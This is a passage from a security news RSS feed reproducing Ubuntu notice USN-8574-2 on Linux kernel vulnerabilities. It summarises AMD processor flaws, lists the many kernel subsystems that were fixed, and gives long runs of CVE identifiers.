CVE-2026-23446, CVE-2026-23447, CVE-2026-23448, CVE-2026-23449,
CVE-2026-23452, CVE-2026-23454, CVE-2026-23456, CVE-2026-23457,
CVE-2026-23458, CVE-2026-23460, CVE-2026-23461, CVE-2026-23462,
CVE-2026-23463, CVE-2026-23464, CVE-2026-23465, CVE-2026-23468,
CVE-2026-23470, CVE-2026-23474, CVE-2026-23475, CVE-2026-31389,
CVE-2026-31391, CVE-2026-31392, CVE-2026-31393, CVE-2026-31394,
CVE-2026-31396, CVE-2026-31399, CVE-2026-31400, CVE-2026-31403,
CVE-2026-31405, CVE-2026-31407, CVE-2026-31408, CVE-2026-31409,
CVE-2026-31412, CVE-2026-31413, CVE-2026-31414, CVE-2026-31415,
CVE-2026-31416, CVE-2026-31417, CVE-2026-31421, CVE-2026-31422,
CVE-2026-31423, CVE-2026-31424, CVE-2026-31425, CVE-2026-31426,
CVE-2026-31427, CVE-2026-31428, CVE-2026-31429, CVE-2026-31430,
CVE-2026-31432, CVE-2026-31433, CVE-2026-31434, CVE-2026-31438,
CVE-2026-31439, CVE-2026-31440, CVE-2026-31441, CVE-2026-31446,
CVE-2026-31447, CVE-2026-31449, CVE-2026-31450, CVE-2026-31451,
CVE-2026-31452, CVE-2026-31453, CVE-2026-31454, CVE-2026-31455,
CVE-2026-31458, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31470, CVE-2026-31473, CVE-2026-31474,
CVE-2026-31476, CVE-2026-31477, CVE-2026-31480, CVE-2026-31482,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31487, CVE-2026-31488,
CVE-2026-31489, CVE-2026-31492, CVE-2026-31494, CVE-2026-31495,
CVE-2026-31496, CVE-2026-31497, CVE-2026-31498, CVE-2026-31499,
CVE-2026-31500, CVE-2026-31502, CVE-2026-31503, CVE-2026-31505,
CVE-2026-31506, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31610,
CVE-2026-31611, CVE-2026-31612, CVE-2026-31613, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31634, CVE-2026-31638, CVE-2026-31639, CVE-2026-31642,
CVE-2026-31645, CVE-2026-31646, CVE-2026-31648, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31658, CVE-2026-31660,
CVE-2026-31661, CVE-2026-31662, CVE-2026-31664, CVE-2026-31665,
CVE-2026-31667, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31686, CVE-2026-31689,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43040, CVE-2026-43041,
CVE-2026-43043, CVE-2026-43044, CVE-2026-43046, CVE-2026-43047,
CVE-2026-43049, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43056, CVE-2026-43057, CVE-2026-43058,
CVE-2026-43059, CVE-2026-43060, CVE-2026-43061, CVE-2026-43062,
CVE-2026-43064, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43084, CVE-2026-43085,
CVE-2026-43086, CVE-2026-43088, CVE-2026-43089, CVE-2026-43091,
CVE-2026-43092, CVE-2026-43093, CVE-2026-43094, CVE-2026-43098,
CVE-2026-43099, CVE-2026-43103, CVE-2026-43104, CVE-2026-43105,
CVE-2026-43107, CVE-2026-43109, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43129, CVE-2026-43162, CVE-2026-43245, CVE-2026-43252,
CVE-2026-43265, CVE-2026-43281, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43342, CVE-2026-43343,
CVE-2026-43345, CVE-2026-43350, CVE-2026-43355, CVE-2026-43357,
CVE-2026-43359, CVE-2026-43360, CVE-2026-43361, CVE-2026-43362,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53354,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8574-2: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3688324/unix-server/usn-8574-2-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688324/unix-server/usn-8574-2-linux-kernel-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 10:01:06 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
